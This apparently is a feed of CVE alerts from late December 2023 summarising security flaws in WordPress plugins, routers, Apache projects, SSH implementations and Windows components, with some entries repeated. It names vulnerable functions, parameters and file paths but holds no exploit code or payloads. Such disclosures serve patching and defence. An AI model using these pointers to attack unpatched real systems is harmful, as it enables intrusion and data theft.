|
| 2023-12-21 14:54:32 |
🚨 CVE-2023-6832Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.🎖@cveNotify |
|
| 2023-12-21 14:24:39 |
🚨 CVE-2023-6145Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection.This issue affects Softomi Advanced C2C Marketplace Software: before 12122023.🎖@cveNotify |
|
| 2023-12-21 14:24:38 |
🚨 CVE-2023-49162Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress.This issue affects BigCommerce For WordPress: from n/a through 5.0.6.🎖@cveNotify |
|
| 2023-12-21 14:24:37 |
🚨 CVE-2023-48288Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP.This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.1.🎖@cveNotify |
|
| 2023-12-21 14:24:34 |
🚨 CVE-2023-2487Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users.This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1.🎖@cveNotify |
|
| 2023-12-21 14:24:33 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-21 14:24:32 |
🚨 CVE-2023-46445An issue in AsyncSSH before 2.14.1 allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack, aka a "Rogue Extension Negotiation."🎖@cveNotify |
|
| 2023-12-21 13:24:51 |
🚨 CVE-2023-5594Improper validation of the server’s certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted.🎖@cveNotify |
|
| 2023-12-21 13:24:45 |
🚨 CVE-2023-51656Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.Users are recommended to upgrade to version 1.2.2, which fixes the issue.🎖@cveNotify |
|
| 2023-12-21 13:24:44 |
🚨 CVE-2023-50475An issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component \vendor\faye-websocket.js.🎖@cveNotify |
|
| 2023-12-21 13:24:43 |
🚨 CVE-2023-50473Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file.🎖@cveNotify |
|
| 2023-12-21 13:24:39 |
🚨 CVE-2023-5988Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS.This issue affects LioXERP: before v.146.🎖@cveNotify |
|
| 2023-12-21 13:24:38 |
🚨 CVE-2023-49920Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent.Users are advised to upgrade to version 2.8.0 or later which is not affected🎖@cveNotify |
|
| 2023-12-21 13:24:33 |
🚨 CVE-2023-47265Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users.Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability🎖@cveNotify |
|
| 2023-12-21 13:24:32 |
🚨 CVE-2023-7025A vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-21 12:24:32 |
🚨 CVE-2023-51656Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.Users are recommended to upgrade to version 1.2.2, which fixes the issue.🎖@cveNotify |
|
| 2023-12-21 11:24:33 |
🚨 CVE-2023-50481An issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js.🎖@cveNotify |
|
| 2023-12-21 11:24:32 |
🚨 CVE-2023-50473Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file.🎖@cveNotify |
|
| 2023-12-21 10:24:38 |
🚨 CVE-2023-5988Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS.This issue affects LioXERP: before v.146.🎖@cveNotify |
|
| 2023-12-21 10:24:37 |
🚨 CVE-2023-51655In JetBrains IntelliJ IDEA before 2023.3.2 code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration🎖@cveNotify |
|
| 2023-12-21 10:24:33 |
🚨 CVE-2023-49920Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent.Users are advised to upgrade to version 2.8.0 or later which is not affected🎖@cveNotify |
|
| 2023-12-21 10:24:32 |
🚨 CVE-2023-2585Keycloak's device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client.🎖@cveNotify |
|
| 2023-12-21 06:24:32 |
🚨 CVE-2023-6622A null pointer dereference vulnerability was found in nft_dynset_init() in net/netfilter/nft_dynset.c in nf_tables in the Linux kernel. This issue may allow a local attacker with CAP_NET_ADMIN user privilege to trigger a denial of service.🎖@cveNotify |
|
| 2023-12-21 05:24:33 |
🚨 CVE-2023-7026A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579.🎖@cveNotify |
|
| 2023-12-21 05:24:32 |
🚨 CVE-2023-49759Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments.This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0.🎖@cveNotify |
|
| 2023-12-21 04:54:40 |
🚨 CVE-2023-46216An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.🎖@cveNotify |
|
| 2023-12-21 04:54:33 |
🚨 CVE-2023-29234A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4.Users are recommended to upgrade to the latest version, which fixes the issue.🎖@cveNotify |
|
| 2023-12-21 04:54:32 |
🚨 CVE-2023-6826The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2023-12-21 04:24:52 |
🚨 CVE-2023-1948A vulnerability, which was classified as problematic, has been found in PHPGurukul BP Monitoring Management System 1.0. This issue affects some unknown processing of the file add-family-member.php of the component Add New Family Member Handler. The manipulation of the argument Member Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225335.🎖@cveNotify |
|
| 2023-12-21 04:24:45 |
🚨 CVE-2023-1909A vulnerability, which was classified as critical, was found in PHPGurukul BP Monitoring Management System 1.0. Affected is an unknown function of the file profile.php of the component User Profile Update Handler. The manipulation of the argument name/mobno leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225318 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-21 04:24:44 |
🚨 CVE-2018-2378In SAP HANA Extended Application Services, 1.0, unauthorized users can read statistical data about deployed applications including resource consumption.🎖@cveNotify |
|
| 2023-12-21 04:24:39 |
🚨 CVE-2018-2376In SAP HANA Extended Application Services, 1.0, a controller user who has SpaceAuditor authorization in a specific space could retrieve application environments within that space.🎖@cveNotify |
|
| 2023-12-21 04:24:38 |
🚨 CVE-2018-2373Under certain circumstances, a specific endpoint of the Controller's API could be misused by unauthenticated users to execute SQL statements that deliver information about system configuration in SAP HANA Extended Application Services, 1.0.🎖@cveNotify |
|
| 2023-12-21 04:24:33 |
🚨 CVE-2015-1311The Extended Application Services (XS) in SAP HANA allows remote attackers to inject arbitrary ABAP code via unspecified vectors, aka SAP Note 2098906. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.🎖@cveNotify |
|
| 2023-12-21 04:24:32 |
🚨 CVE-2014-5171SAP HANA Extend Application Services (XS) does not encrypt transmissions for applications that enable form based authentication using SSL, which allows remote attackers to obtain credentials and other sensitive information by sniffing the network.🎖@cveNotify |
|
| 2023-12-21 03:24:40 |
🚨 CVE-2022-29531An issue was discovered in MISP before 2.4.158. There is stored XSS in the event graph via a tag name.🎖@cveNotify |
|
| 2023-12-21 03:24:33 |
🚨 CVE-2022-29528An issue was discovered in MISP before 2.4.158. PHAR deserialization can occur.🎖@cveNotify |
|
| 2023-12-21 03:24:32 |
🚨 CVE-2022-25319An issue was discovered in Cerebrate through 1.4. Endpoints could be open even when not enabled.🎖@cveNotify |
|
| 2023-12-21 02:54:32 |
🚨 CVE-2023-4734Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1846.🎖@cveNotify |
|
| 2023-12-21 02:24:49 |
🚨 CVE-2023-50992Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function.🎖@cveNotify |
|
| 2023-12-21 02:24:48 |
🚨 CVE-2023-50989Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function.🎖@cveNotify |
|
| 2023-12-21 02:24:47 |
🚨 CVE-2023-50988Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function.🎖@cveNotify |
|
| 2023-12-21 02:24:44 |
🚨 CVE-2023-50986Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function.🎖@cveNotify |
|
| 2023-12-21 02:24:43 |
🚨 CVE-2023-50984Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function.🎖@cveNotify |
|
| 2023-12-21 02:24:42 |
🚨 CVE-2023-50983Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function.🎖@cveNotify |
|
| 2023-12-21 02:24:39 |
🚨 CVE-2023-50639Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page.🎖@cveNotify |
|
| 2023-12-21 02:24:38 |
🚨 CVE-2023-49272Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'children' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.🎖@cveNotify |
|
| 2023-12-21 02:24:37 |
🚨 CVE-2023-49271Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_out_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.🎖@cveNotify |
|
| 2023-12-21 02:24:33 |
🚨 CVE-2023-25970Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop – Global Dropshipping.This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0.🎖@cveNotify |
|
| 2023-12-21 02:24:32 |
🚨 CVE-2022-30159Microsoft Office Information Disclosure Vulnerability. This CVE ID is unique from CVE-2022-30171, CVE-2022-30172.🎖@cveNotify |
|
| 2023-12-21 01:24:40 |
🚨 CVE-2022-21838Windows Cleanup Manager Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-21 01:24:33 |
🚨 CVE-2022-21835Microsoft Cryptographic Services Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-21 01:24:32 |
🚨 CVE-2022-21833Virtual Machine IDE Drive Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:50 |
🚨 CVE-2022-26927Windows Graphics Component Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:49 |
🚨 CVE-2022-26923Active Directory Domain Services Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:44 |
🚨 CVE-2022-23279Windows ALPC Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:43 |
🚨 CVE-2022-22713Windows Hyper-V Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:39 |
🚨 CVE-2022-22019Remote Procedure Call Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:38 |
🚨 CVE-2022-22014Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:33 |
🚨 CVE-2022-22011Windows Graphics Component Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-21 00:24:32 |
🚨 CVE-2022-21972Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-20 23:24:32 |
🚨 CVE-2022-29143Microsoft SQL Server Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-12-20 21:54:32 |
🚨 CVE-2023-22256Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-12-20 21:24:51 |
🚨 CVE-2023-48433Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-20 21:24:45 |
🚨 CVE-2023-49153Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon.This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.🎖@cveNotify |
|
| 2023-12-20 21:24:44 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-20 21:24:43 |
🚨 CVE-2023-48755Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress.This issue affects teachPress: from n/a through 9.0.4.🎖@cveNotify |
|
| 2023-12-20 21:24:39 |
🚨 CVE-2023-48582Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-20 21:24:38 |
🚨 CVE-2023-49345Temporary data passed between application components by Budgie Extras Takeabreak applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.🎖@cveNotify |
|
| 2023-12-20 21:24:33 |
🚨 CVE-2023-49343Temporary data passed between application components by Budgie Extras Dropby applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.🎖@cveNotify |
|
| 2023-12-20 21:24:32 |
🚨 CVE-2023-22265Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-12-20 20:54:38 |
🚨 CVE-2023-6907A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 20:54:37 |
🚨 CVE-2023-6906A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-20 20:54:33 |
🚨 CVE-2023-6899A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-20 20:24:50 |
🚨 CVE-2022-35829Service Fabric Explorer Spoofing Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:49 |
🚨 CVE-2022-33645Windows TCP/IP Driver Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:45 |
🚨 CVE-2022-33634Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:44 |
🚨 CVE-2022-22035Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:39 |
🚨 CVE-2022-41040Microsoft Exchange Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:38 |
🚨 CVE-2022-38013.NET Core and Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:33 |
🚨 CVE-2022-35828Microsoft Defender for Endpoint for Mac Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-20 20:24:32 |
🚨 CVE-2022-1184A use-after-free flaw was found in fs/ext4/namei.c:dx_insert_block() in the Linux kernel’s filesystem sub-component. This flaw allows a local attacker with a user privilege to cause a denial of service.🎖@cveNotify |
|
| 2023-12-20 19:24:50 |
🚨 CVE-2023-49814Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock.This issue affects Symbiostock: from n/a through 6.0.0.🎖@cveNotify |
|
| 2023-12-20 19:24:49 |
🚨 CVE-2023-47784Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution.This issue affects Slider Revolution: from n/a through 6.6.15.🎖@cveNotify |
|
| 2023-12-20 19:24:44 |
🚨 CVE-2023-45603Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End.This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902.🎖@cveNotify |
|
| 2023-12-20 19:24:43 |
🚨 CVE-2023-34007Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.8.3.🎖@cveNotify |
|
| 2023-12-20 19:24:38 |
🚨 CVE-2023-31231Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates).This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65.🎖@cveNotify |
|
| 2023-12-20 19:24:37 |
🚨 CVE-2023-29102Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import.This issue affects Olive One Click Demo Import: from n/a through 1.1.1.🎖@cveNotify |
|
| 2023-12-20 19:24:33 |
🚨 CVE-2023-3164A heap-buffer-overflow vulnerability was found in LibTIFF, in extractImageSection() at tools/tiffcrop.c:7916 and tools/tiffcrop.c:7801. This flaw allows attackers to cause a denial of service via a crafted tiff file.🎖@cveNotify |
|
| 2023-12-20 19:24:32 |
🚨 CVE-2022-4603A vulnerability classified as problematic has been found in ppp. Affected is the function dumpppp of the file pppdump/pppdump.c of the component pppdump. The manipulation of the argument spkt.buf/rpkt.buf leads to improper validation of array index. The real existence of this vulnerability is still doubted at the moment. The name of the patch is a75fb7b198eed50d769c80c36629f38346882cbf. It is recommended to apply a patch to fix this issue. VDB-216198 is the identifier assigned to this vulnerability. NOTE: pppdump is not used in normal process of setting up a PPP connection, is not installed setuid-root, and is not invoked automatically in any scenario.🎖@cveNotify |
|
| 2023-12-20 18:54:33 |
🚨 CVE-2012-2806Heap-based buffer overflow in the get_sos function in jdmarker.c in libjpeg-turbo 1.2.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a large component count in the header of a JPEG image.🎖@cveNotify |
|
| 2023-12-20 18:24:40 |
🚨 CVE-2023-50164An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.🎖@cveNotify |
|
| 2023-12-20 18:24:33 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-12-20 18:24:32 |
🚨 CVE-2022-1800The Export any WordPress data to XML/CSV WordPress plugin before 1.3.5 does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.🎖@cveNotify |
|
| 2023-12-20 17:54:33 |
🚨 CVE-2022-24351TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.🎖@cveNotify |
|
| 2023-12-20 17:54:32 |
🚨 CVE-2023-5764A template injection flaw was found in Ansible where a user's controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce code injection when supplying templating data.🎖@cveNotify |
|
| 2023-12-20 16:54:40 |
🚨 CVE-2020-17483An improper access control vulnerability exists in Uffizio's GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed.🎖@cveNotify |
|
| 2023-12-20 16:54:33 |
🚨 CVE-2023-45894The Remote Application Server in Parallels RAS before 19.2.23975 does not segment virtualized applications from the server, which allows a remote attacker to achieve remote code execution via standard kiosk breakout techniques.🎖@cveNotify |
|
| 2023-12-20 16:54:32 |
🚨 CVE-2016-10165The Type_MLU_Read function in cmstypes.c in Little CMS (aka lcms2) allows remote attackers to obtain sensitive information or cause a denial of service via an image with a crafted ICC profile, which triggers an out-of-bounds heap read.🎖@cveNotify |
|
| 2023-12-20 16:24:50 |
🚨 CVE-2023-5010Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-20 16:24:45 |
🚨 CVE-2023-49825Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.🎖@cveNotify |
|
| 2023-12-20 16:24:44 |
🚨 CVE-2023-49772Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love.This issue affects Genesis Simple Love: from n/a through 2.0.🎖@cveNotify |
|
| 2023-12-20 16:24:39 |
🚨 CVE-2023-35915Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo.This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.🎖@cveNotify |
|
| 2023-12-20 16:24:38 |
🚨 CVE-2023-33330Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo.This issue affects AutomateWoo: from n/a through 4.9.50.🎖@cveNotify |
|
| 2023-12-20 16:24:33 |
🚨 CVE-2023-32743Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo.This issue affects AutomateWoo: from n/a through 5.7.1.🎖@cveNotify |
|
| 2023-12-20 16:24:32 |
🚨 CVE-2021-42794An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses.🎖@cveNotify |
|
| 2023-12-20 15:24:40 |
🚨 CVE-2023-6377A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.🎖@cveNotify |
|
| 2023-12-20 15:24:33 |
🚨 CVE-2023-5868A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.🎖@cveNotify |
|
| 2023-12-20 15:24:32 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2023-12-20 14:54:51 |
🚨 CVE-2023-51460Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-20 14:54:44 |
